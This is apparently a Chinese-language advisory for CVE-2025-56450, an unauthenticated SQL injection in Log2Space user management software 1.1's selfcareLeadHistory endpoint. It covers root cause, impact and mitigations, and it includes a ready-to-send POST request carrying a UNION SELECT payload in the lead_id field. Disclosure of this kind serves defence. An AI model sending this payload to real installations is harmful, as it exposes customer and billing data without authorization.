CVE-2025-56450

Log2Space用户管理软件（版本1.1）中的未授权SQL注入漏洞

概述：

在Log2Space用户管理软件的/l2s/api/selfcareLeadHistory API端点中发现了一个未授权SQL注入漏洞。该漏洞允许远程攻击者无需身份验证即可对后端数据库执行任意SQL查询。

技术细节：

POST /l2s/api/selfcareLeadHistory Content-Type: multipart/form-data Content-Disposition: form-data; name=“lead_id”

易受攻击参数：lead_id

漏洞利用示例

POST /l2s/api/selfcareLeadHistory HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary=—-WebKitFormBoundary Content-Length: xxx

——WebKitFormBoundary Content-Disposition: form-data; name=“lead_id”

1’ UNION SELECT database(),version(),user()– ——WebKitFormBoundary–

根本原因

lead_id参数在没有适当输入验证或参数化语句的情况下直接拼接到SQL查询中。这导致了完整的SQL注入漏洞，允许攻击者：

1. 枚举数据库模式和表名
2. 提取敏感的客户或账单数据
3. 执行堆叠查询
4. 根据数据库配置可能实现远程代码执行

影响

1. 攻击者可以从数据库中提取敏感的客户数据
2. 在某些配置下，SQL注入可能导致远程代码执行
3. 攻击者可以操纵或删除客户和账单数据

缓解措施

1. 为所有数据库操作实施参数化查询（预处理语句）
2. 对所有用户提供的数据实施严格的输入验证和清理
3. 在生产环境中禁用详细的SQL错误消息
4. 在生产环境中禁用详细的SQL错误消息